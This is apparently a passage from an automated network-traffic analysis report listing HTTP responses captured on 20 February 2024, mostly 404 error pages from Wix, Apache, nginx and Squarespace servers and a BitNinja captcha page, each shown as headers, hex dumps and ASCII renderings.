26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 bf cb 39 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 9f 6c 5d 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f3 2b 5b 37 32 28 94 b0 65 ce cd 75 0e e5 1c 7a be a0 82 06 02 39 55 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 5b 2a b6 6c da c3 2b 3b 5c ce 4e 6d f0 5b 72 8d 45 2b 61 79 c4 8c 9d 59 ad ed a2 67 d9 04 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 e6 11 ab 1c cc f2 48 88 c5 62 91 60 2c 93 c2 d6 62 26 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 23 bc 17 bd 96 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 95 98 61 2e 78 f1 2b e8 7b 40 1e d9 9d 3f c8 02 39 3c e2 eb 55 87 95 06 5f 01 60 ea f4 d6 07 58 06 d1 3d 10 9d db b7 60 f6 96 ec f0 3d d7 34 74 00 6f da a9 56 85 48 93 71 7a 9e 1c 0b df a9 17 40 39 8e 46 63 92 0f a4 ce c4 87 fa 33 d1 67 7e 36 b5 e5 8a 69 69 e6 79 04 18 7f Data Ascii: 445Vo6_E-N&0l((Z:[L(R%F}w9ql7c!q~ypXj}g~6#3s.&jyu9M%jYC+X40XP%xw8RF%5GKUNr/E}kEE%l]T!4>+[72(euz9UAx_:baI81\|T5[*l+;\Nm[rE+ayYgBie5TpDcHb`,b&1$$1:\|+#HN(E+9^a.x+{@?9<U_`X=`=4toVHqz@9Fc3g~6iiy
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471566.669147837444212275Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqymrWSBpMfJbY0ZWU2hO35/HubKAh1QhTB6OuUXtTGV,2d58ifebGbosy5xc+FRalo4uW0YfxzzZunGxT0metW6vFvMZn7F5/ZUT8aUqbCCUBztIiQkGLZ43mpHFKVi5CA==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,U0wL3gqDJ/Qt5QAiUjcF4fltqGzoE7zGhVYpbvgHA/E=,/j+AjfLiOiE0Vc9NsP8sK2YSzioqrjKAdIzrANrtYN35JbWzKw0R8+RcLSxYblksOBRpe0xtfquPZAaCoiHmnw==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 91 eb c4 49 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 bf cb 39 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 3f db ba a8 42 68 38 7c 6d d5 7d 1e fd c5 3f be e7 57 b6 6e 64 50 28 61 cb 9c 9b eb 1c ca 39 f4 7c 41 05 0d 04 72 aa 4c 99 47 71 83 f0 be 74 c4 98 fd c3 82 93 c6 6b 19 f0 71 26 3a ea 63 b8 25 f8 c2 a9 26 28 6b b6 54 6c d9 b4 87 57 76 b8 9c 9d da e0 b7 e4 1a 8b 56 c2 f2 88 19 3b b3 5a db 45 cf b2 09 28 85 2e d3 ca dc 31 0a 6a 1e a9 1a e1 88 c6 cc 23 56 39 98 e5 91 10 8b c5 22 c1 58 26 85 ad c5 4c 62 48 ac 49 f0 2b 62 0e 74 1e f9 0a 43 57 b4 81 11 7d 47 78 2f 7a 2d c9 07 74 6d 91 34 d2 49 1f ac 43 4d 9d 50 8c 1b 05 da 8b 50 29 57 72 bc 0e 2b 31 c3 5c f0 e2 57 d0 f7 80 3c b2 3b 7f 90 05 72 78 c4 d7 ab 0e 2b 0d be 02 c0 d4 e9 ad 0f b0 0c a2 7b 20 3a b7 6f c1 ec 2d d9 e1 7b ae 69 e8 00 de b4 53 ad 0a 91 26 93 f4 3c 39 16 be 53 2f 80 72 1c 8d c6 24 1f 48 9d 89 0f f5 67 a2 cf fc 6c 6a cb 15 d3 d2 cc f3 08 30 fe 98 Data Ascii: 444Vo6_E-I&0l((Z:[L(R%F}w9ql7c!q~ypXj}g~6#3s.&jyu9M%jYC+X40XP%xw8RF%5GKUNr/E}kEE%?Bh8\|m}?WndP(a9\|ArLGqtkq&:c%&(kTlWvV;ZE(.1j#V9"X&LbHI+btCW}Gx/z-tm4ICMPP)Wr+1\W<;rx+{ :o-{iS&<9S/r$Hglj0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 21Connection: keep-aliveData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:06 GMTcontent-type: text/html; charset=iso-8859-1content-length: 196server: Apachex-iplb-request-id: BF60E3DE:CB7A_D5BA2104:0050_65D5350C_13B39:7B84x-iplb-instance: 51911Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Length: 13701Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-238.ec2.internalX-Request-Id: a207cb5a-0e99-42a7-93e0-1980c7cc9330Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471566.784147837444222275Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqymrWSBpMfJbY0ZWU2hO35/HubKAh1QhTB6OuUXtTGV,2d58ifebGbosy5xc+FRalsTwqU4RI6WEQskWAgsLHFCe3/SScY6ACT7u6aWaxtKZPDFB/0chFXzBP0oLY++gmA==,2UNV7KOq4oGjA5+PKsX47HNYW5FMKOqazjq32++LUUhYgeUJqUXtid+86vZww+nL,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,esXX8rTfzq2RRUC1xyAPv6D492b3qqr7SqQvqDE7ViE=,/j+AjfLiOiE0Vc9NsP8sK5C483KhHL0nZ8WejdH6PvV3rMRpwhuqafklhVFdC7d9sdHr4zo+FezP22KH3yZA0A==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 91 eb d4 6e 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 31 e7 8c 71 7e 71 74 94 1d 97 b6 08 eb 06 58 15 6a 7d 81 67 ce 8f 18 7e e8 36 23 1a 33 0b 2e 9b 26 8f 96 6a 75 e5 9c 75 bf cb 05 f8 f7 4d 13 d1 03 90 e5 05 be cf 6a 08 92 19 59 43 1e dd 29 58 36 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc a9 02 78 77 38 51 46 05 25 35 f7 85 d4 90 a7 27 ac 96 2b 55 b7 f5 7f 84 d6 83 eb 4e 72 86 2f 8c 45 7d 1b 45 45 25 9d 07 14 dc 86 39 9f ee 5c 54 21 34 1c be b6 ea 2e 8f fe e2 1f df f3 4b 5b 37 32 28 94 b0 63 ce f5 55 0e e5 02 7a be a0 82 06 02 39 53 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 21 dc 12 7c e1 54 13 94 35 3b 2a 76 6c 3a c0 2b 7b 5c ce ce 6c f0 3b 72 8d 45 2b 61 75 c2 8c 9d 5b ad ed b2 67 d9 06 94 42 97 69 65 6e 19 05 35 8f 54 8d 70 44 63 16 11 ab 1c cc f3 48 88 e5 72 99 60 2c 93 c2 d6 62 2e 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 27 bc 17 bd 91 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 b5 98 63 2e 78 f1 2b e8 3b 40 1e d9 9d 3f c8 02 39 3c e2 eb 55 87 b5 06 5f 01 60 ea f4 d6 07 58 05 d1 3d 10 9d db 77 60 f6 96 ec f1 3d d5 34 74 00 6f da 99 56 85 48 93 49 fa 2e 39 15 be 53 2f 80 72 1c 8d c6 24 1f 48 9d 89 f7 f5 67 a2 cf fc 6c 66 cb 35 d3 d2 2c f2 08 30 fe 98 Data Ascii: 442Vo6_E-n&0l((Z:[L(R%F}w9ql7c1q~qtXj}g~6#3.&juuMjYC)X60XP%xw8QF%5'+UNr/E}EE%9\T!4.K[72(cUz9SAx_:baI8!\|T5;*vl:+{\l;rE+au[gBien5TpDcHr`,b.1$$1:\|+'HN(E+9^c.x+;@?9<U_`X=w`=4toVHI.9S/r$Hglf5,0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471566.7851477841833226972Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkiHzpTYSDRA7u88Ic3Fde4MbwluI1yUDJty9McxOlfY,2d58ifebGbosy5xc+FRalgBNTJhxT1xBW0QacJY5ItLlvYfM2ZkeLbtvhuNQ4rZHF1uafk7LeANS7S+bsnNWsQ==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,HFwuyehutl8tT21go4rzKQuGWFn2wMQWjizQyxww5Ro=,/j+AjfLiOiE0Vc9NsP8sK3wn3HKfNyHsngqdvH35wynwHI026nY8X82AVI4uc6ntz725C8t8ZYCuhGMAdFHN2Q==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 5b 6f db 36 14 7e cf af 60 f4 a2 16 08 c5 c8 b9 d8 c9 a4 00 5d d6 62 79 19 86 0d 05 36 14 45 41 4b c7 16 13 8a 54 49 2a b6 d1 f5 bf ef 1c 49 f6 9c 38 58 e3 c4 0f b6 79 c8 73 f9 ce 9d b1 ec 90 73 c6 38 bf 3a 38 c8 0e 4b 5b 84 55 03 ac 0a b5 be c2 33 e7 07 0c 3f 74 9b 11 8d 99 39 97 4d 93 47 0b b5 7c ef 9c 75 bf cb 39 f8 77 4d 13 d1 03 90 e5 15 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 9f 6c 5d 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f1 6b 5b 37 32 28 94 b0 65 ce cd fb 1c ca 39 f4 7c 41 05 0d 04 72 aa 4c 99 47 71 83 f0 be 74 c4 98 fd c3 82 93 c6 6b 19 f0 71 26 3a ea 63 b8 25 f8 c2 a9 26 28 6b b6 54 6c d9 b4 87 57 76 b8 9c 9d da e0 b7 e4 1a 8b 56 c2 f2 88 19 3b b3 5a db 45 cf b2 09 28 85 2e d3 ca dc 31 0a 6a 1e a9 1a e1 88 c6 cc 23 56 39 98 e5 91 10 8b c5 22 c1 58 26 85 ad c5 4c 62 48 ac 49 f0 2b 62 0e 74 1e f9 0a 43 57 b4 81 11 7d 47 78 2f 7a 2d c9 07 74 6d 91 34 d2 49 1f ac 43 4d 9d 50 8c 1b 05 da 8b 50 29 57 72 bc 0e 2b 31 c3 5c f0 e2 57 d0 f7 80 3c b2 3b 7f 90 05 72 78 c4 d7 ab 0e 2b 0d be 02 c0 d4 e9 ad 0f b0 0c a2 7b 20 3a b7 6f c1 ec 2d d9 e1 7b ae 69 e8 00 de b4 53 ad 0a 91 26 e3 f4 22 39 16 be 53 2f 80 72 1c 8d c6 24 1f 48 9d 89 0f f5 67 a2 cf fc 6c 6a cb 15 d3 d2 cc f3 08 30 fe Data Ascii: 445V[o6~`]by6EAKTI*I8Xyss8:8K[U3?t9MG\|u9wMjYC+X40XP%xw8RF%5GKUNr/E}kEE%l]T!4>k[72(e9\|ArLGqtkq&:c%&(kTlWvV;ZE(.1j#V9"X&LbHI+btCW}Gx/z-tm4ICMPP)Wr+1\W<;rx+{ :o-{iS&"9S/r$Hglj0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77570Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:06 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: keYvR01k/iofNqQGNData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:06 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 21Connection: keep-aliveData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:06 GMTcontent-type: text/html; charset=iso-8859-1content-length: 196server: Apachex-iplb-request-id: BF60E3DE:CB7A_D5BA2104:0050_65D5350E_14079:7B84x-iplb-instance: 51911Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 